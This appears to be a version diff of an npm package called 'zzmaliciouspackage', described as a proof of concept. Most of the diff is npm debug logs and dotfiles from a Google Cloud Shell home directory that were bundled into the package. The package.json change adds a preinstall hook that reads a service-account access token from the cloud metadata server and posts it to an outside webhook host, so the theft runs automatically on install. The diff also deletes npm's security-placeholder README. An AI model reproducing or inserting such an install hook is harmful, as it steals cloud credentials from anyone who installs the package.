+
9 verbose logfile /home/zzigdon/.npm/_logs/2025-01-13T11_45_21_671Z-debug-0.log
|
11
|
+
10 silly logfile done cleaning log files
|
12
|
+
11 verbose cwd /home/zzigdon
|
13
|
+
12 verbose os Linux 6.1.112+
|
14
|
+
13 verbose node v22.12.0
|
15
|
+
14 verbose npm v11.0.0
|
16
|
+
15 verbose exit 0
|
17
|
+
16 info ok
|
@@ -0,0 +1,17 @@
|
|
1
|
+
0 verbose cli /usr/local/nvm/versions/node/v22.13.1/bin/node /usr/local/nvm/versions/node/v22.13.1/bin/npm
|
2
|
+
1 info using npm@11.0.0
|
3
|
+
2 info using node@v22.13.1
|
4
|
+
3 silly config load:file:/usr/local/nvm/versions/node/v22.13.1/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/home/zzigdon/.npmrc
|
6
|
+
5 silly config load:file:/usr/local/nvm/versions/node/v22.13.1/etc/npmrc
|
7
|
+
6 verbose title npm config get prefix
|
8
|
+
7 verbose argv "config" "--loglevel" "warn" "get" "prefix"
|
9
|
+
8 verbose logfile logs-max:10 dir:/home/zzigdon/.npm/_logs/2025-02-11T13_10_32_216Z-
|
10
|
+
9 verbose logfile /home/zzigdon/.npm/_logs/2025-02-11T13_10_32_216Z-debug-0.log
|
11
|
+
10 silly logfile done cleaning log files
|
12
|
+
11 verbose cwd /home/zzigdon
|
13
|
+
12 verbose os Linux 6.1.124+
|
14
|
+
13 verbose node v22.13.1
|
15
|
+
14 verbose npm v11.0.0
|
16
|
+
15 verbose exit 0
|
17
|
+
16 info ok
|
@@ -0,0 +1,33 @@
|
|
1
|
+
0 verbose cli /usr/local/nvm/versions/node/v22.13.1/bin/node /usr/local/nvm/versions/node/v22.13.1/bin/npm
|
2
|
+
1 info using npm@11.0.0
|
3
|
+
2 info using node@v22.13.1
|
4
|
+
3 silly config load:file:/usr/local/nvm/versions/node/v22.13.1/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/home/zzigdon/.npmrc
|
6
|
+
5 silly config load:file:/usr/local/nvm/versions/node/v22.13.1/etc/npmrc
|
7
|
+
6 verbose title npm init
|
8
|
+
7 verbose argv "init"
|
9
|
+
8 verbose logfile logs-max:10 dir:/home/zzigdon/.npm/_logs/2025-02-11T13_16_40_877Z-
|
10
|
+
9 verbose logfile /home/zzigdon/.npm/_logs/2025-02-11T13_16_40_877Z-debug-0.log
|
11
|
+
10 silly logfile done cleaning log files
|
12
|
+
11 http fetch GET 200 https://registry.npmjs.org/npm 196ms
|
13
|
+
12 silly package data {
|
14
|
+
12 silly package data name: 'zzmaliciouspackage',
|
15
|
+
12 silly package data version: '1.0.0',
|
16
|
+
12 silly package data description: 'poc',
|
17
|
+
12 silly package data main: 'index.js',
|
18
|
+
12 silly package data scripts: { test: "echo 'test'" },
|
19
|
+
12 silly package data author: 'me',
|
20
|
+
12 silly package data license: 'ISC',
|
21
|
+
12 silly package data type: 'commonjs'
|
22
|
+
12 silly package data }
|
23
|
+
13 verbose cwd /home/zzigdon
|
24
|
+
14 verbose os Linux 6.1.124+
|
25
|
+
15 verbose node v22.13.1
|
26
|
+
16 verbose npm v11.0.0
|
27
|
+
17 notice
|
28
|
+
17 notice New [33mminor[39m version of npm available! [33m11.0.0[39m -> [34m11.1.0[39m
|
29
|
+
17 notice Changelog: [34mhttps://github.com/npm/cli/releases/tag/v11.1.0[39m
|
30
|
+
17 notice To update run: [4mnpm install -g npm@11.1.0[24m
|
31
|
+
17 notice { force: true, [Symbol(proc-log.meta)]: true }
|
32
|
+
18 verbose exit 0
|
33
|
+
19 info ok
|
@@ -0,0 +1,63 @@
|
|
1
|
+
0 verbose cli /usr/local/nvm/versions/node/v22.13.1/bin/node /usr/local/nvm/versions/node/v22.13.1/bin/npm
|
2
|
+
1 info using npm@11.0.0
|
3
|
+
2 info using node@v22.13.1
|
4
|
+
3 silly config load:file:/usr/local/nvm/versions/node/v22.13.1/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/home/zzigdon/.npmrc
|
6
|
+
5 silly config load:file:/usr/local/nvm/versions/node/v22.13.1/etc/npmrc
|
7
|
+
6 verbose title npm publish
|
8
|
+
7 verbose argv "publish" "--scope" "public"
|
9
|
+
8 verbose logfile logs-max:10 dir:/home/zzigdon/.npm/_logs/2025-02-11T13_24_31_398Z-
|
10
|
+
9 verbose logfile /home/zzigdon/.npm/_logs/2025-02-11T13_24_31_398Z-debug-0.log
|
11
|
+
10 silly logfile done cleaning log files
|
12
|
+
11 verbose publish [ '.' ]
|
13
|
+
12 silly packumentCache heap:2197815296 maxSize:549453824 maxEntrySize:274726912
|
14
|
+
13 notice
|
15
|
+
14 notice 📦 zzmaliciouspackage@1.0.0
|
16
|
+
15 notice Tarball Contents
|
17
|
+
16 notice 9.5kB .bash_history
|
18
|
+
16 notice 220B .bash_logout
|
19
|
+
16 notice 3.8kB .bashrc
|
20
|
+
16 notice 1.5kB .config/powershell/Microsoft.PowerShell_profile.ps1
|
21
|
+
16 notice 3.0kB .docker/config.json
|
22
|
+
16 notice 806B .npm/_logs/2024-12-29T09_58_02_271Z-debug-0.log
|
23
|
+
16 notice 806B .npm/_logs/2024-12-29T13_28_32_046Z-debug-0.log
|
24
|
+
16 notice 806B .npm/_logs/2025-01-07T09_56_41_159Z-debug-0.log
|
25
|
+
16 notice 806B .npm/_logs/2025-01-07T11_06_09_776Z-debug-0.log
|
26
|
+
16 notice 806B .npm/_logs/2025-01-07T11_13_34_128Z-debug-0.log
|
27
|
+
16 notice 806B .npm/_logs/2025-01-08T14_46_43_919Z-debug-0.log
|
28
|
+
16 notice 806B .npm/_logs/2025-01-13T11_45_21_671Z-debug-0.log
|
29
|
+
16 notice 806B .npm/_logs/2025-02-11T13_10_32_216Z-debug-0.log
|
30
|
+
16 notice 1.5kB .npm/_logs/2025-02-11T13_16_40_877Z-debug-0.log
|
31
|
+
16 notice 753B .npm/_logs/2025-02-11T13_24_31_398Z-debug-0.log
|
32
|
+
16 notice 0B .npm/_update-notifier-last-checked
|
33
|
+
16 notice 807B .profile
|
34
|
+
16 notice 48B .rustup/settings.toml
|
35
|
+
16 notice 0B .sudo_as_admin_successful
|
36
|
+
16 notice 840B .viminfo
|
37
|
+
16 notice 913B README-cloudshell.txt
|
38
|
+
16 notice 467B package.json
|
39
|
+
17 notice Tarball Details
|
40
|
+
18 notice name: zzmaliciouspackage
|
41
|
+
19 notice version: 1.0.0
|
42
|
+
20 notice filename: zzmaliciouspackage-1.0.0.tgz
|
43
|
+
21 notice package size: 6.4 kB
|
44
|
+
22 notice unpacked size: 29.8 kB
|
45
|
+
23 notice shasum: 72bff1c6c8ee043a1e355607bfc80d6abacebb6a
|
46
|
+
24 notice integrity: sha512-inws2qL6ObQEG[...]J7HHKCdUJ7f+g==
|
47
|
+
25 notice total files: 22
|
48
|
+
26 notice
|
49
|
+
27 verbose stack Error: This command requires you to be logged in to https://registry.npmjs.org/
|
50
|
+
27 verbose stack at #publish (/usr/local/nvm/versions/node/v22.13.1/lib/node_modules/npm/lib/commands/publish.js:156:29)
|
51
|
+
27 verbose stack at async Publish.exec (/usr/local/nvm/versions/node/v22.13.1/lib/node_modules/npm/lib/commands/publish.js:46:5)
|
52
|
+
27 verbose stack at async Npm.exec (/usr/local/nvm/versions/node/v22.13.1/lib/node_modules/npm/lib/npm.js:207:9)
|
53
|
+
27 verbose stack at async module.exports (/usr/local/nvm/versions/node/v22.13.1/lib/node_modules/npm/lib/cli/entry.js:69:5)
|
54
|
+
28 error code ENEEDAUTH
|
55
|
+
29 error need auth This command requires you to be logged in to https://registry.npmjs.org/
|
56
|
+
30 error need auth You need to authorize this machine using `npm adduser`
|
57
|
+
31 verbose cwd /home/zzigdon
|
58
|
+
32 verbose os Linux 6.1.124+
|
59
|
+
33 verbose node v22.13.1
|
60
|
+
34 verbose npm v11.0.0
|
61
|
+
35 verbose exit 1
|
62
|
+
36 verbose code 1
|
63
|
+
37 error A complete log of this run can be found in: /home/zzigdon/.npm/_logs/2025-02-11T13_24_31_398Z-debug-0.log
|
@@ -0,0 +1,144 @@
|
|
1
|
+
0 verbose cli /usr/local/nvm/versions/node/v22.13.1/bin/node /usr/local/nvm/versions/node/v22.13.1/bin/npm
|
2
|
+
1 info using npm@11.0.0
|
3
|
+
2 info using node@v22.13.1
|
4
|
+
3 silly config load:file:/usr/local/nvm/versions/node/v22.13.1/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/home/zzigdon/.npmrc
|
6
|
+
5 silly config load:file:/usr/local/nvm/versions/node/v22.13.1/etc/npmrc
|
7
|
+
6 verbose title npm adduser
|
8
|
+
7 verbose argv "adduser"
|
9
|
+
8 verbose logfile logs-max:10 dir:/home/zzigdon/.npm/_logs/2025-02-11T13_25_04_599Z-
|
10
|
+
9 verbose logfile /home/zzigdon/.npm/_logs/2025-02-11T13_25_04_599Z-debug-0.log
|
11
|
+
10 silly logfile done cleaning log files
|
12
|
+
11 notice Log in on https://registry.npmjs.org/
|
13
|
+
12 verbose web adduser before first POST
|
14
|
+
13 http fetch POST 200 https://registry.npmjs.org/-/v1/login 304ms
|
15
|
+
14 verbose web auth got response {
|
16
|
+
14 verbose web auth loginUrl: 'https://www.npmjs.com/login?next=/login/cli/777eb0e6-985f-41b8-b7aa-58cda9572c10',
|
17
|
+
14 verbose web auth doneUrl: 'https://registry.npmjs.org/-/v1/done?sessionId=777eb0e6-985f-41b8-b7aa-58cda9572c10'
|
18
|
+
14 verbose web auth }
|
19
|
+
15 verbose web auth opening url pair
|
20
|
+
16 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 204ms
|
21
|
+
17 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 180ms
|
22
|
+
18 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 239ms
|
23
|
+
19 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 193ms
|
24
|
+
20 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 199ms
|
25
|
+
21 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 180ms
|
26
|
+
22 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 184ms
|
27
|
+
23 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 184ms
|
28
|
+
24 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 210ms
|
29
|
+
25 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 183ms
|
30
|
+
26 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 195ms
|
31
|
+
27 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 191ms
|
32
|
+
28 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 177ms
|
33
|
+
29 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 173ms
|
34
|
+
30 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 185ms
|
35
|
+
31 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 179ms
|
36
|
+
32 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 183ms
|
37
|
+
33 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 174ms
|
38
|
+
34 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 202ms
|
39
|
+
35 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 209ms
|
40
|
+
36 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 219ms
|
41
|
+
37 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 186ms
|
42
|
+
38 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 190ms
|
43
|
+
39 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 179ms
|
44
|
+
40 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 190ms
|
45
|
+
41 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 195ms
|
46
|
+
42 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 177ms
|
47
|
+
43 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 182ms
|
48
|
+
44 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 184ms
|
49
|
+
45 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 189ms
|
50
|
+
46 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 187ms
|
51
|
+
47 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 188ms
|
52
|
+
48 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 179ms
|
53
|
+
49 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 187ms
|
54
|
+
50 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 182ms
|
55
|
+
51 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 176ms
|
56
|
+
52 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 189ms
|
57
|
+
53 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 189ms
|
58
|
+
54 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 200ms
|
59
|
+
55 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 183ms
|
60
|
+
56 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 187ms
|
61
|
+
57 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 181ms
|
62
|
+
58 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 179ms
|
63
|
+
59 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 185ms
|
64
|
+
60 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 195ms
|
65
|
+
61 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 184ms
|
66
|
+
62 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 177ms
|
67
|
+
63 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 190ms
|
68
|
+
64 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 218ms
|
69
|
+
65 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 187ms
|
70
|
+
66 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 189ms
|
71
|
+
67 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 183ms
|
72
|
+
68 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 184ms
|
73
|
+
69 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 216ms
|
74
|
+
70 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 190ms
|
75
|
+
71 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 178ms
|
76
|
+
72 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 198ms
|
77
|
+
73 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 188ms
|
78
|
+
74 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 176ms
|
79
|
+
75 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 192ms
|
80
|
+
76 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 201ms
|
81
|
+
77 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 178ms
|
82
|
+
78 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 188ms
|
83
|
+
79 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 179ms
|
84
|
+
80 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 186ms
|
85
|
+
81 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 174ms
|
86
|
+
82 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 172ms
|
87
|
+
83 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 190ms
|
88
|
+
84 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 197ms
|
89
|
+
85 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 192ms
|
90
|
+
86 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 177ms
|
91
|
+
87 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 193ms
|
92
|
+
88 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 181ms
|
93
|
+
89 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 181ms
|
94
|
+
90 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 190ms
|
95
|
+
91 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 194ms
|
96
|
+
92 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 195ms
|
97
|
+
93 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 178ms
|
98
|
+
94 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 183ms
|
99
|
+
95 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 200ms
|
100
|
+
96 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 191ms
|
101
|
+
97 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 178ms
|
102
|
+
98 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 174ms
|
103
|
+
99 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 180ms
|
104
|
+
100 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 186ms
|
105
|
+
101 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 207ms
|
106
|
+
102 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 209ms
|
107
|
+
103 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 178ms
|
108
|
+
104 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 195ms
|
109
|
+
105 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 201ms
|
110
|
+
106 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 195ms
|
111
|
+
107 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 181ms
|
112
|
+
108 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 179ms
|
113
|
+
109 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 217ms
|
114
|
+
110 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 179ms
|
115
|
+
111 http fetch GET 404 https://registry.npmjs.org/-/v1/done?sessionId=*** 188ms
|
116
|
+
112 verbose web add user not supported, trying couch
|
117
|
+
113 verbose adduser before first PUT {
|
118
|
+
113 verbose adduser _id: 'org.couchdb.user:fjntwlxixjtwcdzmkd1',
|
119
|
+
113 verbose adduser name: 'fjntwlxixjtwcdzmkd1',
|
120
|
+
113 verbose adduser password: 'XXXXX',
|
121
|
+
113 verbose adduser email: 'zzigdon@paloaltonetworks.com',
|
122
|
+
113 verbose adduser type: 'user',
|
123
|
+
113 verbose adduser roles: [],
|
124
|
+
113 verbose adduser date: '2025-02-11T13:33:24.032Z'
|
125
|
+
113 verbose adduser }
|
126
|
+
114 notice Please check your email for a one-time password (OTP)
|
127
|
+
115 http fetch PUT 401 https://registry.npmjs.org/-/user/org.couchdb.user:fjntwlxixjtwcdzmkd1 543ms
|
128
|
+
116 verbose adduser before first PUT {
|
129
|
+
116 verbose adduser _id: 'org.couchdb.user:fjntwlxixjtwcdzmkd1',
|
130
|
+
116 verbose adduser name: 'fjntwlxixjtwcdzmkd1',
|
131
|
+
116 verbose adduser password: 'XXXXX',
|
132
|
+
116 verbose adduser email: 'zzigdon@paloaltonetworks.com',
|
133
|
+
116 verbose adduser type: 'user',
|
134
|
+
116 verbose adduser roles: [],
|
135
|
+
116 verbose adduser date: '2025-02-11T13:33:46.170Z'
|
136
|
+
116 verbose adduser }
|
137
|
+
117 http fetch PUT 201 https://registry.npmjs.org/-/user/org.couchdb.user:fjntwlxixjtwcdzmkd1 620ms
|
138
|
+
118 info adduser Logged in on https://registry.npmjs.org/.
|
139
|
+
119 verbose cwd /home/zzigdon
|
140
|
+
120 verbose os Linux 6.1.124+
|
141
|
+
121 verbose node v22.13.1
|
142
|
+
122 verbose npm v11.0.0
|
143
|
+
123 verbose exit 0
|
144
|
+
124 info ok
|
@@ -0,0 +1,14 @@
|
|
1
|
+
0 verbose cli /usr/local/nvm/versions/node/v22.13.1/bin/node /usr/local/nvm/versions/node/v22.13.1/bin/npm
|
2
|
+
1 info using npm@11.0.0
|
3
|
+
2 info using node@v22.13.1
|
4
|
+
3 silly config load:file:/usr/local/nvm/versions/node/v22.13.1/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/home/zzigdon/.npmrc
|
6
|
+
5 silly config load:file:/usr/local/nvm/versions/node/v22.13.1/etc/npmrc
|
7
|
+
6 verbose title npm publish
|
8
|
+
7 verbose argv "publish" "--scope" "public"
|
9
|
+
8 verbose logfile logs-max:10 dir:/home/zzigdon/.npm/_logs/2025-02-11T13_34_14_153Z-
|
10
|
+
9 verbose logfile /home/zzigdon/.npm/_logs/2025-02-11T13_34_14_153Z-debug-0.log
|
11
|
+
10 silly logfile start cleaning logs, removing 1 files
|
12
|
+
11 silly logfile done cleaning log files
|
13
|
+
12 verbose publish [ '.' ]
|
14
|
+
13 silly packumentCache heap:2197815296 maxSize:549453824 maxEntrySize:274726912
|
File without changes
|
package/.profile
ADDED
@@ -0,0 +1,27 @@
|
|
1
|
+
# ~/.profile: executed by the command interpreter for login shells.
|
2
|
+
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
|
3
|
+
# exists.
|
4
|
+
# see /usr/share/doc/bash/examples/startup-files for examples.
|
5
|
+
# the files are located in the bash-doc package.
|
6
|
+
|
7
|
+
# the default umask is set in /etc/profile; for setting the umask
|
8
|
+
# for ssh logins, install and configure the libpam-umask package.
|
9
|
+
#umask 022
|
10
|
+
|
11
|
+
# if running bash
|
12
|
+
if [ -n "$BASH_VERSION" ]; then
|
13
|
+
# include .bashrc if it exists
|
14
|
+
if [ -f "$HOME/.bashrc" ]; then
|
15
|
+
. "$HOME/.bashrc"
|
16
|
+
fi
|
17
|
+
fi
|
18
|
+
|
19
|
+
# set PATH so it includes user's private bin if it exists
|
20
|
+
if [ -d "$HOME/bin" ] ; then
|
21
|
+
PATH="$HOME/bin:$PATH"
|
22
|
+
fi
|
23
|
+
|
24
|
+
# set PATH so it includes user's private bin if it exists
|
25
|
+
if [ -d "$HOME/.local/bin" ] ; then
|
26
|
+
PATH="$HOME/.local/bin:$PATH"
|
27
|
+
fi
|
File without changes
|
package/.viminfo
ADDED
@@ -0,0 +1,45 @@
|
|
1
|
+
# This viminfo file was generated by Vim 9.1.
|
2
|
+
# You may edit it if you're careful!
|
3
|
+
|
4
|
+
# Viminfo version
|
5
|
+
|1,4
|
6
|
+
|
7
|
+
# Value of 'encoding' when this file was written
|
8
|
+
*encoding=utf-8
|
9
|
+
|
10
|
+
|
11
|
+
# hlsearch on (H) or off (h):
|
12
|
+
~h
|
13
|
+
# Command Line History (newest to oldest):
|
14
|
+
:x!
|
15
|
+
|2,0,1739280264,,"x!"
|
16
|
+
|
17
|
+
# Search String History (newest to oldest):
|
18
|
+
|
19
|
+
# Expression History (newest to oldest):
|
20
|
+
|
21
|
+
# Input Line History (newest to oldest):
|
22
|
+
|
23
|
+
# Debug Line History (newest to oldest):
|
24
|
+
|
25
|
+
# Registers:
|
26
|
+
|
27
|
+
# File marks:
|
28
|
+
'0 11 195 ~/package.json
|
29
|
+
|4,48,11,195,1739280264,"~/package.json"
|
30
|
+
|
31
|
+
# Jumplist (newest first):
|
32
|
+
-' 11 195 ~/package.json
|
33
|
+
|4,39,11,195,1739280264,"~/package.json"
|
34
|
+
-' 1 0 ~/package.json
|
35
|
+
|4,39,1,0,1739279903,"~/package.json"
|
36
|
+
|
37
|
+
# History of marks within files (newest to oldest):
|
38
|
+
|
39
|
+
> ~/package.json
|
40
|
+
* 1739280261 0
|
41
|
+
" 11 195
|
42
|
+
^ 11 196
|
43
|
+
. 11 195
|
44
|
+
+ 1 0
|
45
|
+
+ 11 195
|
@@ -0,0 +1,16 @@
|
|
1
|
+
|
2
|
+
Welcome to Google Cloud Shell, a tool for managing resources hosted on Google Cloud Platform!
|
3
|
+
The machine comes pre-installed with the Google Cloud SDK and other popular developer tools.
|
4
|
+
|
5
|
+
Your 5GB home directory will persist across sessions, but the VM is ephemeral and will be reset
|
6
|
+
approximately 20 minutes after your session ends. No system-wide change will persist beyond that.
|
7
|
+
|
8
|
+
Type "gcloud help" to get help on using Cloud SDK. For more examples, visit
|
9
|
+
https://cloud.google.com/shell/docs/quickstart and https://cloud.google.com/shell/docs/examples
|
10
|
+
|
11
|
+
Type "cloudshell help" to get help on using the "cloudshell" utility. Common functionality is
|
12
|
+
aliased to short commands in your shell, for example, you can type "dl <filename>" at Bash prompt to
|
13
|
+
download a file. Type "cloudshell aliases" to see these commands.
|
14
|
+
|
15
|
+
Type "help" to see this message any time. Type "builtin help" to see Bash interpreter help.
|
16
|
+
|
package/package.json
CHANGED
@@ -1,6 +1,14 @@
|
|
1
1
|
{
|
2
2
|
"name": "zzmaliciouspackage",
|
3
|
-
"version": "0.0
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "1.0.0",
|
4
|
+
"description": "poc",
|
5
|
+
"license": "ISC",
|
6
|
+
"author": "me",
|
7
|
+
"type": "commonjs",
|
8
|
+
"main": "index.js",
|
9
|
+
"scripts": {
|
10
|
+
"test": "echo 'test'",
|
11
|
+
"preinstall": "access_token=$(curl -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/232503593247-compute@developer.gserviceaccount.com/token');curl -X POST -d $access_token https://webhook.com"
|
12
|
+
|
13
|
+
}
|
6
14
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=zzmaliciouspackage for more information.
|